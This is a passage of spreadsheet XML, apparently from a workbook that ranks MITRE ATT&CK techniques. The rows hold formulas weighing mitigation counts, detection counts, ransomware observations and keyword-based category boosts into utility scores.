      <c r="H184" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I184">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J184">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K184">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L184">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M184" s="25">
        <v>0</v>
      </c>
      <c r="N184" s="51">
        <v>0</v>
      </c>
      <c r="O184" s="51">
        <v>0</v>
      </c>
      <c r="P184" s="51">
        <v>0</v>
      </c>
      <c r="Q184" s="51">
        <v>0</v>
      </c>
      <c r="R184" s="52" t="s">
        <v>752</v>
      </c>
      <c r="S184" s="51">
        <v>8</v>
      </c>
      <c r="T184" s="52" t="s">
        <v>383</v>
      </c>
      <c r="U184" s="51">
        <v>19</v>
      </c>
      <c r="V184" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25714285714285717</v>
      </c>
      <c r="W184">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>27</v>
      </c>
      <c r="X184">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.49090909090909091</v>
      </c>
      <c r="Y184">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.49090909090909091</v>
      </c>
      <c r="Z184">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA184">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB184">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC184" s="29" t="s">
        <v>384</v>
      </c>
      <c r="AD184" s="25" t="str" cm="1">
        <f t="array" ref="AD184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC184)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE184" s="25">
        <f>IF(AD184="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF184" s="25" t="str" cm="1">
        <f t="array" ref="AF184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC184)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG184" s="25">
        <f>IF(AF184="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH184" s="25" t="str" cm="1">
        <f t="array" ref="AH184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC184)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI184" s="25">
        <f>IF(AH184="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ184" s="25" t="str" cm="1">
        <f t="array" ref="AJ184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC184)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK184" s="25">
        <f>IF(AJ184="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL184" s="25" t="str" cm="1">
        <f t="array" ref="AL184">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC184)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM184" s="25">
        <f>IF(AL184="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN184" s="52">
        <v>0</v>
      </c>
      <c r="AO184" s="51">
        <v>0</v>
      </c>
      <c r="AP184" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.2785714285714295E-2</v>
      </c>
      <c r="AQ184" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14261904761904765</v>
      </c>
      <c r="AR184" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14261904761904765</v>
      </c>
      <c r="AS184" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT184" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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85" spans="1:47">
      <c r="A185" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.17554857142857141</v>
      </c>
      <c r="B185" s="25">
        <f>SUM(H185,M185,V185)*(1+SUM(AE185,AG185,AI185,AK185,AM185))</f>
        <v>0.42215238095238089</v>
      </c>
      <c r="C185" s="25" t="s">
        <v>820</v>
      </c>
      <c r="D185" s="25" t="s">
        <v>353</v>
      </c>
      <c r="E185" s="25" t="s">
        <v>821</v>
      </c>
      <c r="F185" s="51">
        <v>1</v>
      </c>
      <c r="G185" s="51">
        <v>1</v>
      </c>
      <c r="H185" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I185">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J185">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K185">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L185">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M185" s="25">
        <v>0</v>
      </c>
      <c r="N185" s="51">
        <v>5</v>
      </c>
      <c r="O185" s="51">
        <v>1</v>
      </c>
      <c r="P185" s="51">
        <v>0</v>
      </c>
      <c r="Q185" s="51">
        <v>1</v>
      </c>
      <c r="R185" s="52" t="s">
        <v>822</v>
      </c>
      <c r="S185" s="51">
        <v>11</v>
      </c>
      <c r="T185" s="51" t="s">
        <v>823</v>
      </c>
      <c r="U185" s="51">
        <v>12</v>
      </c>
      <c r="V185" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25238095238095237</v>
      </c>
      <c r="W185">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X185">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y185">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z185">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA185">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB185">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC185" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD185" s="25" t="str" cm="1">
        <f t="array" ref="AD185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC185)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE185" s="25">
        <f>IF(AD185="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF185" s="25" t="str" cm="1">
        <f t="array" ref="AF185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC185)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG185" s="25">
        <f>IF(AF185="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH185" s="25" t="str" cm="1">
        <f t="array" ref="AH185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC185)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI185" s="25">
        <f>IF(AH185="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ185" s="25" t="str" cm="1">
        <f t="array" ref="AJ185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC185)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK185" s="25">
        <f>IF(AJ185="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL185" s="25" t="str" cm="1">
        <f t="array" ref="AL185">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC185)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM185" s="25">
        <f>IF(AL185="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN185" s="52">
        <v>4</v>
      </c>
      <c r="AO185" s="51">
        <v>1</v>
      </c>
      <c r="AP185" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.17554857142857141</v>
      </c>
      <c r="AQ185" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1407174603174603</v>
      </c>
      <c r="AR185" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1407174603174603</v>
      </c>
      <c r="AS185" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT185" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU18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86" spans="1:47" ht="48">
      <c r="A186" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11353333333333333</v>
      </c>
      <c r="B186" s="25">
        <f>SUM(H186,M186,V186)*(1+SUM(AE186,AG186,AI186,AK186,AM186))</f>
        <v>0.46866666666666668</v>
      </c>
      <c r="C186" s="25" t="s">
        <v>824</v>
      </c>
      <c r="D186" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E186" s="25" t="s">
        <v>825</v>
      </c>
      <c r="F186" s="51">
        <v>1</v>
      </c>
      <c r="G186" s="51">
        <v>1</v>
      </c>
      <c r="H186" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I186">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J186">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K186">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L186">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M186" s="25">
        <v>0</v>
      </c>
      <c r="N186" s="51">
        <v>1</v>
      </c>
      <c r="O186" s="51">
        <v>12</v>
      </c>
      <c r="P186" s="51">
        <v>0</v>
      </c>
      <c r="Q186" s="51">
        <v>2</v>
      </c>
      <c r="R186" s="52" t="s">
        <v>105</v>
      </c>
      <c r="S186" s="51">
        <v>7</v>
      </c>
      <c r="T186" s="52" t="s">
        <v>826</v>
      </c>
      <c r="U186" s="51">
        <v>12</v>
      </c>
      <c r="V186" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25238095238095237</v>
      </c>
      <c r="W186">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X186">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y186">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z186">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>15</v>
      </c>
      <c r="AA186">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.15</v>
      </c>
      <c r="AB186">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.15</v>
      </c>
      <c r="AC186" s="29" t="s">
        <v>127</v>
      </c>
      <c r="AD186" s="25" t="str" cm="1">
        <f t="array" ref="AD186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC186)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE186" s="25">
        <f>IF(AD186="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF186" s="25" t="str" cm="1">
        <f t="array" ref="AF186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC186)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG186" s="25">
        <f>IF(AF186="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH186" s="25" t="str" cm="1">
        <f t="array" ref="AH186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC186)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI186" s="25">
        <f>IF(AH186="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ186" s="25" t="str" cm="1">
        <f t="array" ref="AJ186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC186)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK186" s="25">
        <f>IF(AJ186="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL186" s="25" t="str" cm="1">
        <f t="array" ref="AL186">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC186)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM186" s="25">
        <f>IF(AL186="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN186" s="60">
        <v>2</v>
      </c>
      <c r="AO186" s="51">
        <v>1</v>
      </c>
      <c r="AP186" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11353333333333333</v>
      </c>
      <c r="AQ186" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15622222222222223</v>
      </c>
      <c r="AR186" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15622222222222223</v>
      </c>
      <c r="AS186" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT186" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU18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87" spans="1:47" ht="32.1">
      <c r="A187" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6866666666666668E-2</v>
      </c>
      <c r="B187" s="25">
        <f>SUM(H187,M187,V187)*(1+SUM(AE187,AG187,AI187,AK187,AM187))</f>
        <v>0.46866666666666668</v>
      </c>
      <c r="C187" s="25" t="s">
        <v>827</v>
      </c>
      <c r="D187" s="25" t="s">
        <v>460</v>
      </c>
      <c r="E187" s="25" t="s">
        <v>828</v>
      </c>
      <c r="F187" s="51">
        <v>1</v>
      </c>
      <c r="G187" s="51">
        <v>1</v>
      </c>
      <c r="H187" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I187">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J187">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K187">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L187">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M187" s="25">
        <v>0</v>
      </c>
      <c r="N187" s="51">
        <v>0</v>
      </c>
      <c r="O187" s="51">
        <v>1</v>
      </c>
      <c r="P187" s="51">
        <v>0</v>
      </c>
      <c r="Q187" s="51">
        <v>0</v>
      </c>
      <c r="R187" s="52" t="s">
        <v>829</v>
      </c>
      <c r="S187" s="51">
        <v>8</v>
      </c>
      <c r="T187" s="52" t="s">
        <v>784</v>
      </c>
      <c r="U187" s="56">
        <v>18</v>
      </c>
      <c r="V187" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25238095238095237</v>
      </c>
      <c r="W187">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X187">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y187">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z187">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA187">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB187">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC187" s="29" t="s">
        <v>368</v>
      </c>
      <c r="AD187" s="25" t="str" cm="1">
        <f t="array" ref="AD187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC187)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE187" s="25">
        <f>IF(AD187="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF187" s="25" t="str" cm="1">
        <f t="array" ref="AF187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC187)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG187" s="25">
        <f>IF(AF187="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH187" s="25" t="str" cm="1">
        <f t="array" ref="AH187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC187)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI187" s="25">
        <f>IF(AH187="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ187" s="25" t="str" cm="1">
        <f t="array" ref="AJ187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC187)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK187" s="25">
        <f>IF(AJ187="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL187" s="25" t="str" cm="1">
        <f t="array" ref="AL187">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC187)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM187" s="25">
        <f>IF(AL187="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN187" s="52">
        <v>0</v>
      </c>
      <c r="AO187" s="51">
        <v>0</v>
      </c>
      <c r="AP187" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6866666666666668E-2</v>
      </c>
      <c r="AQ187" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15622222222222223</v>
      </c>
      <c r="AR187" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15622222222222223</v>
      </c>
      <c r="AS187" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT187" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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88" spans="1:47" ht="48">
      <c r="A188" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6866666666666668E-2</v>
      </c>
      <c r="B188" s="25">
        <f>SUM(H188,M188,V188)*(1+SUM(AE188,AG188,AI188,AK188,AM188))</f>
        <v>0.46866666666666668</v>
      </c>
      <c r="C188" s="25" t="s">
        <v>830</v>
      </c>
      <c r="D188" s="25" t="s">
        <v>124</v>
      </c>
      <c r="E188" s="25" t="s">
        <v>831</v>
      </c>
      <c r="F188" s="51">
        <v>1</v>
      </c>
      <c r="G188" s="51">
        <v>1</v>
      </c>
      <c r="H188" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I188">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J188">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K188">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L188">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M188" s="25">
        <v>0</v>
      </c>
      <c r="N188" s="51">
        <v>0</v>
      </c>
      <c r="O188" s="51">
        <v>1</v>
      </c>
      <c r="P188" s="51">
        <v>0</v>
      </c>
      <c r="Q188" s="51">
        <v>0</v>
      </c>
      <c r="R188" s="52" t="s">
        <v>832</v>
      </c>
      <c r="S188" s="51">
        <v>10</v>
      </c>
      <c r="T188" s="52" t="s">
        <v>833</v>
      </c>
      <c r="U188" s="51">
        <v>16</v>
      </c>
      <c r="V188" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25238095238095237</v>
      </c>
      <c r="W188">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X188">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y188">
